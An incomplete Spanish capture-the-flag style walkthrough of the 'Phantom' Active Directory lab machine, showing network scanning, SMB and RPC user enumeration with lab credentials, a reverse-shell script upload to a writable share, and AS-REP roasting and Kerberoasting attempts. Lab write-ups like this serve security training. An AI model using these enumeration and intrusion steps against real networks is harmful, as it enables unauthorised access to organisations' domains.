Phantom - TheHackerLabs

texto

Herramientas utilizadas:

  • ping
  • nmap
  • **
  • **
  • **
  • **






Recopilación de Información


Descubrimiento de Hosts

Hagamos un descubrimiento de hosts para encontrar a nuestro objetivo.

Lo haremos primero con nmap:

nmap -sn 192.168.56.0/24
Starting Nmap 7.98 ( https://nmap.org ) at 2026-04-26 23:07 -0600
Nmap scan report for 192.168.56.1
Host is up (0.00042s latency).
MAC Address: XX (Unknown)
Nmap scan report for 192.168.56.100
Host is up (0.00053s latency).
MAC Address: XX (Oracle VirtualBox virtual NIC)
Nmap scan report for 192.168.56.102
Host is up.
Nmap done: 256 IP addresses (3 hosts up) scanned in 1.91 seconds

Vamos a probar la herramienta arp-scan:

arp-scan -I eth0 -g 192.168.56.0/24
Interface: eth0, type: EN10MB, MAC: 08:00:27:8d:c1:60, IPv4: 192.168.56.102
Starting arp-scan 1.10.0 with 256 hosts (https://github.com/royhills/arp-scan)
192.168.56.1	XX	PCS Systemtechnik GmbH
192.168.56.100	XX	PCS Systemtechnik GmbH

3 packets received by filter, 0 packets dropped by kernel
Ending arp-scan 1.10.0: 256 hosts scanned in 2.143 seconds (119.46 hosts/sec). 2 responded

Encontramos nuestro objetivo y es: 192.168.56.100.


Traza ICMP

Vamos a realizar un ping para saber si la máquina está activa y en base al TTL veremos que SO opera en la máquina.

ping -c 4 192.168.56.100
PING 192.168.56.100 (192.168.56.100) 56(84) bytes of data.
64 bytes from 192.168.56.100: icmp_seq=1 ttl=128 time=0.804 ms
64 bytes from 192.168.56.100: icmp_seq=2 ttl=128 time=1.00 ms
64 bytes from 192.168.56.100: icmp_seq=3 ttl=128 time=0.971 ms
64 bytes from 192.168.56.100: icmp_seq=4 ttl=128 time=0.874 ms

--- 192.168.56.100 ping statistics ---
4 packets transmitted, 4 received, 0% packet loss, time 3002ms
rtt min/avg/max/mdev = 0.804/0.912/1.001/0.078 ms

Por el TTL sabemos que la máquina usa Windows, hagamos los escaneos de puertos y servicios.


Escaneo de Puertos

nmap -p- --open -sS --min-rate 5000 -vvv -n -Pn 192.168.56.100 -oG allPorts
Host discovery disabled (-Pn). All addresses will be marked 'up' and scan times may be slower.
Starting Nmap 7.98 ( https://nmap.org ) at 2026-04-26 23:09 -0600
Initiating ARP Ping Scan at 23:09
Scanning 192.168.56.100 [1 port]
Completed ARP Ping Scan at 23:09, 0.06s elapsed (1 total hosts)
Initiating SYN Stealth Scan at 23:09
Scanning 192.168.56.100 [65535 ports]
Discovered open port 135/tcp on 192.168.56.100
Discovered open port 139/tcp on 192.168.56.100
Discovered open port 53/tcp on 192.168.56.100
Discovered open port 445/tcp on 192.168.56.100
Discovered open port 3269/tcp on 192.168.56.100
Discovered open port 59503/tcp on 192.168.56.100
Discovered open port 59466/tcp on 192.168.56.100
Discovered open port 593/tcp on 192.168.56.100
Discovered open port 59458/tcp on 192.168.56.100
Discovered open port 88/tcp on 192.168.56.100
Discovered open port 9389/tcp on 192.168.56.100
Discovered open port 464/tcp on 192.168.56.100
Discovered open port 636/tcp on 192.168.56.100
Discovered open port 3268/tcp on 192.168.56.100
Discovered open port 59464/tcp on 192.168.56.100
Discovered open port 59487/tcp on 192.168.56.100
Discovered open port 5985/tcp on 192.168.56.100
Discovered open port 49664/tcp on 192.168.56.100
Discovered open port 59478/tcp on 192.168.56.100
Discovered open port 389/tcp on 192.168.56.100
Completed SYN Stealth Scan at 23:09, 26.32s elapsed (65535 total ports)
Nmap scan report for 192.168.56.100
Host is up, received arp-response (0.00060s latency).
Scanned at 2026-04-26 23:09:21 CST for 26s
Not shown: 65515 filtered tcp ports (no-response)
Some closed ports may be reported as filtered due to --defeat-rst-ratelimit
PORT      STATE SERVICE          REASON
53/tcp    open  domain           syn-ack ttl 128
88/tcp    open  kerberos-sec     syn-ack ttl 128
135/tcp   open  msrpc            syn-ack ttl 128
139/tcp   open  netbios-ssn      syn-ack ttl 128
389/tcp   open  ldap             syn-ack ttl 128
445/tcp   open  microsoft-ds     syn-ack ttl 128
464/tcp   open  kpasswd5         syn-ack ttl 128
593/tcp   open  http-rpc-epmap   syn-ack ttl 128
636/tcp   open  ldapssl          syn-ack ttl 128
3268/tcp  open  globalcatLDAP    syn-ack ttl 128
3269/tcp  open  globalcatLDAPssl syn-ack ttl 128
5985/tcp  open  wsman            syn-ack ttl 128
9389/tcp  open  adws             syn-ack ttl 128
49664/tcp open  unknown          syn-ack ttl 128
59458/tcp open  unknown          syn-ack ttl 128
59464/tcp open  unknown          syn-ack ttl 128
59466/tcp open  unknown          syn-ack ttl 128
59478/tcp open  unknown          syn-ack ttl 128
59487/tcp open  unknown          syn-ack ttl 128
59503/tcp open  unknown          syn-ack ttl 128
MAC Address: XX (Oracle VirtualBox virtual NIC)

Read data files from: /usr/share/nmap
Nmap done: 1 IP address (1 host up) scanned in 26.50 seconds
           Raw packets sent: 131053 (5.766MB) | Rcvd: 23 (996B)
Parámetros Descripción
-p- Para indicarle un escaneo en ciertos puertos.
–open Para indicar que aplique el escaneo en los puertos abiertos.
-sS Para indicar un TCP Syn Port Scan para que nos agilice el escaneo.
–min-rate Para indicar una cantidad de envió de paquetes de datos no menor a la que indiquemos (en nuestro caso pedimos 5000).
-vvv Para indicar un triple verbose, un verbose nos muestra lo que vaya obteniendo el escaneo.
-n Para indicar que no se aplique resolución dns para agilizar el escaneo.
-Pn Para indicar que se omita el descubrimiento de hosts.
-oG Para indicar que el output se guarde en un fichero grepeable. Lo nombre allPorts.


Vemos muchos puertos abiertos, entre ellos el puerto 88, que nos indica el uso del servicio Kerberos, por lo que nos enfrentaremos a una máquina Active Directory.


Escaneo de Servicios

nmap -sCV -p 53,88,135,139,389,445,464,593,636,3268,3269,5985,9389,49664,59458,59464,59466,59478,59487,59503 192.168.56.100 -oN targeted
Starting Nmap 7.98 ( https://nmap.org ) at 2026-04-26 23:10 -0600
Nmap scan report for 192.168.56.100
Host is up (0.0016s latency).

PORT      STATE SERVICE       VERSION
53/tcp    open  domain        Simple DNS Plus
88/tcp    open  kerberos-sec  Microsoft Windows Kerberos (server time: 2026-04-27 05:25:32Z)
135/tcp   open  msrpc         Microsoft Windows RPC
139/tcp   open  netbios-ssn   Microsoft Windows netbios-ssn
389/tcp   open  ldap          Microsoft Windows Active Directory LDAP (Domain: PHANTOM.THL, Site: Default-First-Site-Name)
|_ssl-date: 2026-04-27T05:26:59+00:00; +15m15s from scanner time.
| ssl-cert: Subject: commonName=DC01.PHANTOM.THL
| Subject Alternative Name: othername: 1.3.6.1.4.1.311.25.1:<unsupported>, DNS:DC01.PHANTOM.THL
| Not valid before: 2026-02-21T23:24:38
|_Not valid after:  2027-02-21T23:24:38
445/tcp   open  microsoft-ds?
464/tcp   open  kpasswd5?
593/tcp   open  ncacn_http    Microsoft Windows RPC over HTTP 1.0
636/tcp   open  ssl/ldap      Microsoft Windows Active Directory LDAP (Domain: PHANTOM.THL, Site: Default-First-Site-Name)
| ssl-cert: Subject: commonName=DC01.PHANTOM.THL
| Subject Alternative Name: othername: 1.3.6.1.4.1.311.25.1:<unsupported>, DNS:DC01.PHANTOM.THL
| Not valid before: 2026-02-21T23:24:38
|_Not valid after:  2027-02-21T23:24:38
|_ssl-date: 2026-04-27T05:26:59+00:00; +15m15s from scanner time.
3268/tcp  open  ldap          Microsoft Windows Active Directory LDAP (Domain: PHANTOM.THL, Site: Default-First-Site-Name)
|_ssl-date: 2026-04-27T05:26:59+00:00; +15m15s from scanner time.
| ssl-cert: Subject: commonName=DC01.PHANTOM.THL
| Subject Alternative Name: othername: 1.3.6.1.4.1.311.25.1:<unsupported>, DNS:DC01.PHANTOM.THL
| Not valid before: 2026-02-21T23:24:38
|_Not valid after:  2027-02-21T23:24:38
3269/tcp  open  ssl/ldap      Microsoft Windows Active Directory LDAP (Domain: PHANTOM.THL, Site: Default-First-Site-Name)
|_ssl-date: 2026-04-27T05:26:59+00:00; +15m15s from scanner time.
| ssl-cert: Subject: commonName=DC01.PHANTOM.THL
| Subject Alternative Name: othername: 1.3.6.1.4.1.311.25.1:<unsupported>, DNS:DC01.PHANTOM.THL
| Not valid before: 2026-02-21T23:24:38
|_Not valid after:  2027-02-21T23:24:38
5985/tcp  open  http          Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-server-header: Microsoft-HTTPAPI/2.0
|_http-title: Not Found
9389/tcp  open  mc-nmf        .NET Message Framing
49664/tcp open  msrpc         Microsoft Windows RPC
59458/tcp open  msrpc         Microsoft Windows RPC
59464/tcp open  ncacn_http    Microsoft Windows RPC over HTTP 1.0
59466/tcp open  msrpc         Microsoft Windows RPC
59478/tcp open  msrpc         Microsoft Windows RPC
59487/tcp open  msrpc         Microsoft Windows RPC
59503/tcp open  msrpc         Microsoft Windows RPC
MAC Address: XX (Oracle VirtualBox virtual NIC)
Service Info: Host: DC01; OS: Windows; CPE: cpe:/o:microsoft:windows

Host script results:
|_clock-skew: mean: 15m15s, deviation: 0s, median: 15m14s
|_nbstat: NetBIOS name: DC01, NetBIOS user: <unknown>, NetBIOS MAC: XX (Oracle VirtualBox virtual NIC)
| smb2-time: 
|   date: 2026-04-27T05:26:20
|_  start_date: N/A
| smb2-security-mode: 
|   3.1.1: 
|_    Message signing enabled and required

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 94.34 seconds
Parámetros Descripción
-sC Para indicar un lanzamiento de scripts básicos de reconocimiento.
-sV Para identificar los servicios/versión que están activos en los puertos que se analicen.
-p Para indicar puertos específicos.
-oN Para indicar que el output se guarde en un fichero. Lo llame targeted.


Gracias a este escaneo, podemos ver muchas cosas interesantes:

  • Podemos ver cual es el dominio del AD siendo PHANTOM.THL y DC01.PHANTOM.THL, siendo que podemos guardarlos en el /etc/hosts:
    echo "192.168.56.100 PHANTOM.THL DC01.PHANTOM.THL" >> /etc/hosts
    
  • Vemos que el puerto 5985 esta abierto, lo que nos dice que quizá nos podamos conectar a la máquina víctima vía WinRM.
  • El servicio SMB nos dice que se necesita un usuario y contraseña para poder utilizarlo.

Para avanzar con esta máquina, tenemos un usuario y contraseña que nos puede ayudar a encontrar alguna vulnerabilidad:

User: mark
Pass: suP3rPa$sw0rd2026!&

Vamos a comenzar con enumeración del servicio SMB, luego del servicio RPC y por último veamos que podemos realizar antes el servicio Kerberos.




Análisis de Vulnerabilidades


Enumeración de Servicio SMB

Utilicemos la herramienta netexec para ver información del servicio SMB:

nxc smb 192.168.56.100
SMB         192.168.56.100  445    DC01             [*] Windows Server 2022 Build 20348 x64 (name:DC01) (domain:PHANTOM.THL) (signing:True) (SMBv1:None) (Null Auth:True)

Ahora, probemos si las credenciales que nos dieron funcionan:

nxc smb 192.168.56.100 -u 'mark' -p 'suP3rPa$sw0rd2026!&'
SMB         192.168.56.100  445    DC01             [*] Windows Server 2022 Build 20348 x64 (name:DC01) (domain:PHANTOM.THL) (signing:True) (SMBv1:None) (Null Auth:True)
SMB         192.168.56.100  445    DC01             [+] PHANTOM.THL\mark:suP3rPa$sw0rd2026!&

Si funcionan.

Veamos qué archivos compartidos existen con la herramienta smbmap:

smbmap -H 192.168.56.100 -u 'mark' -p 'suP3rPa$sw0rd2026!&' --no-banner
[*] Detected 1 hosts serving SMB                                                                                                  
[*] Established 1 SMB connections(s) and 1 authenticated session(s)                                                      
                                                                                                                             
[+] IP: 192.168.56.100:445	Name: 192.168.56.100      	Status: Authenticated
	Disk                                                  	Permissions	Comment
	----                                                  	-----------	-------
	ADMIN$                                            	NO ACCESS	Admin remota
	C$                                                	NO ACCESS	Recurso predeterminado
	Dev Tools                                         	READ, WRITE	Dev Tools
	IPC$                                              	READ ONLY	IPC remota
	NETLOGON                                          	READ ONLY	Recurso compartido del servidor de inicio de sesi¢n 
	SYSVOL                                            	READ ONLY	Recurso compartido del servidor de inicio de sesi¢n 
[*] Closed 1 connections

Existe un directorio en el que podemos leer y escribir.

Veamos su contenido:

smbmap -H 192.168.56.100 -u 'mark' -p 'suP3rPa$sw0rd2026!&' -r 'Dev Tools' --no-banner
[*] Detected 1 hosts serving SMB                                                                                                  
[*] Established 1 SMB connections(s) and 1 authenticated session(s)                                                      
                                                                                                                             
[+] IP: 192.168.56.100:445	Name: 192.168.56.100      	Status: Authenticated
	Disk                                                  	Permissions	Comment
	----                                                  	-----------	-------
	ADMIN$                                            	NO ACCESS	Admin remota
	C$                                                	NO ACCESS	Recurso predeterminado
	Dev Tools                                         	READ, WRITE	Dev Tools
	./Dev Tools
	dr--r--r--                0 Sun Apr 26 23:30:33 2026	.
	dr--r--r--                0 Sat Feb 21 11:29:29 2026	..
	IPC$                                              	READ ONLY	IPC remota
	NETLOGON                                          	READ ONLY	Recurso compartido del servidor de inicio de sesi¢n 
	SYSVOL                                            	READ ONLY	Recurso compartido del servidor de inicio de sesi¢n 
[*] Closed 1 connections

Curiosamente, no hay nada.

Lo que podríamos hacer es obtener todos los usuarios existentes de la máquina, aplicando un RYD Cycling Attack.


Aplicando RYD Cycling Attack

Esto lo aplicaremos con la herramienta netexec y la flag --rid-brute:

nxc smb 192.168.56.100 -u 'mark' -p 'suP3rPa$sw0rd2026!&' --rid-brute
SMB         192.168.56.100  445    DC01             [*] Windows Server 2022 Build 20348 x64 (name:DC01) (domain:PHANTOM.THL) (signing:True) (SMBv1:None) (Null Auth:True)
SMB         192.168.56.100  445    DC01             [+] PHANTOM.THL\mark:suP3rPa$sw0rd2026!& 
SMB         192.168.56.100  445    DC01             498: PHANTOM\Enterprise Domain Controllers de sólo lectura (SidTypeGroup)
SMB         192.168.56.100  445    DC01             500: PHANTOM\Administrador (SidTypeUser)
SMB         192.168.56.100  445    DC01             501: PHANTOM\Invitado (SidTypeUser)
SMB         192.168.56.100  445    DC01             502: PHANTOM\krbtgt (SidTypeUser)
SMB         192.168.56.100  445    DC01             512: PHANTOM\Admins. del dominio (SidTypeGroup)
SMB         192.168.56.100  445    DC01             513: PHANTOM\Usuarios del dominio (SidTypeGroup)
SMB         192.168.56.100  445    DC01             514: PHANTOM\Invitados del dominio (SidTypeGroup)
SMB         192.168.56.100  445    DC01             515: PHANTOM\Equipos del dominio (SidTypeGroup)
SMB         192.168.56.100  445    DC01             516: PHANTOM\Controladores de dominio (SidTypeGroup)
SMB         192.168.56.100  445    DC01             517: PHANTOM\Publicadores de certificados (SidTypeAlias)
SMB         192.168.56.100  445    DC01             518: PHANTOM\Administradores de esquema (SidTypeGroup)
SMB         192.168.56.100  445    DC01             519: PHANTOM\Administradores de empresas (SidTypeGroup)
SMB         192.168.56.100  445    DC01             520: PHANTOM\Propietarios del creador de directivas de grupo (SidTypeGroup)
SMB         192.168.56.100  445    DC01             521: PHANTOM\Controladores de dominio de sólo lectura (SidTypeGroup)
SMB         192.168.56.100  445    DC01             522: PHANTOM\Controladores de dominio clonables (SidTypeGroup)
SMB         192.168.56.100  445    DC01             525: PHANTOM\Protected Users (SidTypeGroup)
SMB         192.168.56.100  445    DC01             526: PHANTOM\Administradores clave (SidTypeGroup)
SMB         192.168.56.100  445    DC01             527: PHANTOM\Administradores clave de la organización (SidTypeGroup)
SMB         192.168.56.100  445    DC01             553: PHANTOM\Servidores RAS e IAS (SidTypeAlias)
SMB         192.168.56.100  445    DC01             571: PHANTOM\Grupo de replicación de contraseña RODC permitida (SidTypeAlias)
SMB         192.168.56.100  445    DC01             572: PHANTOM\Grupo de replicación de contraseña RODC denegada (SidTypeAlias)
SMB         192.168.56.100  445    DC01             1000: PHANTOM\DC01$ (SidTypeUser)
SMB         192.168.56.100  445    DC01             1101: PHANTOM\DnsAdmins (SidTypeAlias)
SMB         192.168.56.100  445    DC01             1102: PHANTOM\DnsUpdateProxy (SidTypeGroup)
SMB         192.168.56.100  445    DC01             1103: PHANTOM\mark (SidTypeUser)
SMB         192.168.56.100  445    DC01             1104: PHANTOM\bob (SidTypeUser)
SMB         192.168.56.100  445    DC01             1105: PHANTOM\joe (SidTypeUser)
SMB         192.168.56.100  445    DC01             1106: PHANTOM\mia (SidTypeUser)
SMB         192.168.56.100  445    DC01             1107: PHANTOM\sandra (SidTypeUser)
SMB         192.168.56.100  445    DC01             1108: PHANTOM\maria (SidTypeUser)
SMB         192.168.56.100  445    DC01             1109: PHANTOM\ana (SidTypeUser)
SMB         192.168.56.100  445    DC01             1110: PHANTOM\michael (SidTypeUser)
SMB         192.168.56.100  445    DC01             1111: PHANTOM\ian (SidTypeUser)
SMB         192.168.56.100  445    DC01             1112: PHANTOM\joshua (SidTypeUser)
SMB         192.168.56.100  445    DC01             1113: PHANTOM\frank (SidTypeUser)
SMB         192.168.56.100  445    DC01             1115: PHANTOM\tomas (SidTypeUser)
SMB         192.168.56.100  445    DC01             1116: PHANTOM\robert (SidTypeUser)
SMB         192.168.56.100  445    DC01             1117: PHANTOM\IT (SidTypeGroup)
SMB         192.168.56.100  445    DC01             1118: PHANTOM\Support (SidTypeGroup)
SMB         192.168.56.100  445    DC01             1119: PHANTOM\RRHH (SidTypeGroup)
SMB         192.168.56.100  445    DC01             1120: PHANTOM\Finances (SidTypeGroup)
SMB         192.168.56.100  445    DC01             1121: PHANTOM\Developers (SidTypeGroup)
SMB         192.168.56.100  445    DC01             1122: PHANTOM\HelpDesk (SidTypeGroup)
SMB         192.168.56.100  445    DC01             1123: PHANTOM\DevOps (SidTypeGroup)
SMB         192.168.56.100  445    DC01             1124: PHANTOM\LegacyAdmins (SidTypeUser)
SMB         192.168.56.100  445    DC01             1125: PHANTOM\Monitoring (SidTypeGroup)

Observa todos los grupos que obtenemos y los usuarios.

Con estos usuarios podemos intentar aplicar un Password Spraying para saber si alguno de estos tiene la misma contraseña que nuestro usuario actual, pero esto no servira.

Otra opción que tenemos es subir un archivo al directorio Dev Tools, suponiendo que todos los archivos que se suban se ejecuten, pero tampoco servira.

Por ahora, dejemos un poco SMB y apliquemos enumeración al servicio RPC.


Enumeración del Servicio RPC

Entremos al servicio RPC utilizando la herramienta rpcclient:

rpcclient -U 'mark%suP3rPa$sw0rd2026!&' 192.168.56.100
rpcclient $>

Estamos dentro.

Veamos los usuarios existentes:

rpcclient $> enumdomusers
user:[Administrador] rid:[0x1f4]
user:[Invitado] rid:[0x1f5]
user:[krbtgt] rid:[0x1f6]
user:[mark] rid:[0x44f]
user:[bob] rid:[0x450]
user:[joe] rid:[0x451]
user:[mia] rid:[0x452]
user:[sandra] rid:[0x453]
user:[maria] rid:[0x454]
user:[ana] rid:[0x455]
user:[michael] rid:[0x456]
user:[ian] rid:[0x457]
user:[joshua] rid:[0x458]
user:[frank] rid:[0x459]
user:[tomas] rid:[0x45b]
user:[robert] rid:[0x45c]
user:[LegacyAdmins] rid:[0x464]

Bien, no cambia a cuando lo hicimos con el servicio SMB.

Enumeremos las descripciones de cada usuario con querydispinfo, esto para ver si aparece algún dato de cualquier usuario que nos sea de ayuda:

rpcclient $> querydispinfo
index: 0xeda RID: 0x1f4 acb: 0x00000210 Account: Administrador	Name: (null)	Desc: Cuenta integrada para la administración del equipo o dominio
index: 0xfb7 RID: 0x455 acb: 0x00000210 Account: ana	Name: Ana	Desc: (null)
index: 0xfb2 RID: 0x450 acb: 0x00000210 Account: bob	Name: Bob	Desc: (null)
index: 0xfbb RID: 0x459 acb: 0x00000210 Account: frank	Name: Frank	Desc: (null)
index: 0xfb9 RID: 0x457 acb: 0x00000210 Account: ian	Name: Ian	Desc: (null)
index: 0xedb RID: 0x1f5 acb: 0x00000215 Account: Invitado	Name: (null)	Desc: Cuenta integrada para el acceso como invitado al equipo o dominio
index: 0xfb3 RID: 0x451 acb: 0x00000210 Account: joe	Name: Joe	Desc: (null)
index: 0xfba RID: 0x458 acb: 0x00000210 Account: joshua	Name: Joshua	Desc: (null)
index: 0xf10 RID: 0x1f6 acb: 0x00020011 Account: krbtgt	Name: (null)	Desc: Cuenta de servicio de centro de distribución de claves
index: 0xfc6 RID: 0x464 acb: 0x00000210 Account: LegacyAdmins	Name: LegacyAdmins	Desc: Legacy administrative group maintained for backward compatibility with older systems.
index: 0xfb6 RID: 0x454 acb: 0x00000210 Account: maria	Name: Maria	Desc: (null)
index: 0xfb1 RID: 0x44f acb: 0x00000210 Account: mark	Name: Mark	Desc: (null)
index: 0xfb4 RID: 0x452 acb: 0x00000210 Account: mia	Name: Mia	Desc: (null)
index: 0xfb8 RID: 0x456 acb: 0x00000210 Account: michael	Name: Michael	Desc: (null)
index: 0xfbe RID: 0x45c acb: 0x00000210 Account: robert	Name: Robert	Desc: (null)
index: 0xfb5 RID: 0x453 acb: 0x00000210 Account: sandra	Name: Sandra	Desc: (null)
index: 0xfbd RID: 0x45b acb: 0x00000210 Account: tomas	Name: Tomas	Desc: (null)

No hay nada que destacar.

Enumeremos los grupos existentes:

rpcclient $> enumdomgroups
group:[Enterprise Domain Controllers de sólo lectura] rid:[0x1f2]
group:[Admins. del dominio] rid:[0x200]
group:[Usuarios del dominio] rid:[0x201]
group:[Invitados del dominio] rid:[0x202]
group:[Equipos del dominio] rid:[0x203]
group:[Controladores de dominio] rid:[0x204]
group:[Administradores de esquema] rid:[0x206]
group:[Administradores de empresas] rid:[0x207]
group:[Propietarios del creador de directivas de grupo] rid:[0x208]
group:[Controladores de dominio de sólo lectura] rid:[0x209]
group:[Controladores de dominio clonables] rid:[0x20a]
group:[Protected Users] rid:[0x20d]
group:[Administradores clave] rid:[0x20e]
group:[Administradores clave de la organización] rid:[0x20f]
group:[DnsUpdateProxy] rid:[0x44e]
group:[IT] rid:[0x45d]
group:[Support] rid:[0x45e]
group:[RRHH] rid:[0x45f]
group:[Finances] rid:[0x460]
group:[Developers] rid:[0x461]
group:[HelpDesk] rid:[0x462]
group:[DevOps] rid:[0x463]
group:[Monitoring] rid:[0x465]

Hay algunos grupos que se ven interesantes, por ejemplo, los grupos IT, Developers, DevOps, Monitoring y Support, así que quizá esto nos ayuda después.

Por último, te muestro el siguiente oneliner que nos ayuda a obtener todos los usuarios existentes con rpcclient:

rpcclient -U 'mark%suP3rPa$sw0rd2026!&' 192.168.56.100 -c "enumdomusers" | awk -F '[][]' '{print $2}'
Administrador
Invitado
krbtgt
mark
bob
joe
mia
sandra
maria
ana
michael
ian
joshua
frank
tomas
robert
LegacyAdmins

Ya solo guardalos en un archivo o solo agrega que la salida se guarde en un archivo.

ATAQUES POR PROBAR: SCF attack -> carga el file.scf y activa responder Fuerza bruta por kerberos o smb en base a roles de usuarios Usar bloodhound-python y analizar con bloodhound ENumerar denuevo RPC y ver cada descripcion de usuario, roles y grupos a los que pertenecen.




Explotación de Vulnerabilidades


❯ smbmap -H 192.168.56.100 -u 'mark' -p 'suP3rPa$sw0rd2026!&' --upload Invoke-PowerShellTcp.ps1 'Dev Tools/Invoke-PowerShellTcp.ps1' --no-banner
[*] Detected 1 hosts serving SMB                                                                                                  
[*] Established 1 SMB connections(s) and 1 authenticated session(s)                                                      
[+] Starting upload: Invoke-PowerShellTcp.ps1 (4405 bytes)
[+] Upload complete..                                                                                                    
[*] Closed 1 connections                                                                                                     
                                                                                                                                                                                              
❯ smbmap -H 192.168.56.100 -u 'mark' -p 'suP3rPa$sw0rd2026!&' -r 'Dev Tools' --no-banner
[*] Detected 1 hosts serving SMB                                                                                                  
[*] Established 1 SMB connections(s) and 1 authenticated session(s)                                                          
                                                                                                                             
[+] IP: 192.168.56.100:445	Name: PHANTOM.THL         	Status: Authenticated
	Disk                                                  	Permissions	Comment
	----                                                  	-----------	-------
	ADMIN$                                            	NO ACCESS	Admin remota
	C$                                                	NO ACCESS	Recurso predeterminado
	Dev Tools                                         	READ, WRITE	Dev Tools
	./Dev Tools
	dr--r--r--                0 Mon Apr 27 00:23:14 2026	.
	dr--r--r--                0 Sat Feb 21 11:29:29 2026	..
	fr--r--r--             4405 Sun Apr 26 23:49:21 2026	Invoke-PowerShellTcp.ps1
	IPC$                                              	READ ONLY	IPC remota
	NETLOGON                                          	READ ONLY	Recurso compartido del servidor de inicio de sesi¢n 
	SYSVOL                                            	READ ONLY	Recurso compartido del servidor de inicio de sesi¢n 
[*] Closed 1 connections







❯ impacket-GetNPUsers -no-pass -usersfile usuarios.txt PHANTOM.THL/
Impacket v0.14.0.dev0 - Copyright Fortra, LLC and its affiliated companies 

[-] User Administrador doesn't have UF_DONT_REQUIRE_PREAUTH set
[-] Kerberos SessionError: KDC_ERR_CLIENT_REVOKED(Clients credentials have been revoked)
[-] Kerberos SessionError: KDC_ERR_CLIENT_REVOKED(Clients credentials have been revoked)
[-] User mark doesn't have UF_DONT_REQUIRE_PREAUTH set
[-] User bob doesn't have UF_DONT_REQUIRE_PREAUTH set
[-] User joe doesn't have UF_DONT_REQUIRE_PREAUTH set
[-] User mia doesn't have UF_DONT_REQUIRE_PREAUTH set
[-] User sandra doesn't have UF_DONT_REQUIRE_PREAUTH set
[-] User maria doesn't have UF_DONT_REQUIRE_PREAUTH set
[-] User ana doesn't have UF_DONT_REQUIRE_PREAUTH set
[-] User michael doesn't have UF_DONT_REQUIRE_PREAUTH set
[-] User ian doesn't have UF_DONT_REQUIRE_PREAUTH set
[-] User joshua doesn't have UF_DONT_REQUIRE_PREAUTH set
[-] User frank doesn't have UF_DONT_REQUIRE_PREAUTH set
[-] User tomas doesn't have UF_DONT_REQUIRE_PREAUTH set
[-] User robert doesn't have UF_DONT_REQUIRE_PREAUTH set
[-] User LegacyAdmins doesn't have UF_DONT_REQUIRE_PREAUTH set
                                                                                                                                                                                              
❯ impacket-GetUserSPNs 'PHANTOM.THL/mark:suP3rPa$sw0rd2026!&' -dc-host DC01.PHANTOM.THL
Impacket v0.14.0.dev0 - Copyright Fortra, LLC and its affiliated companies 

No entries found!




Post Explotación








links


FIN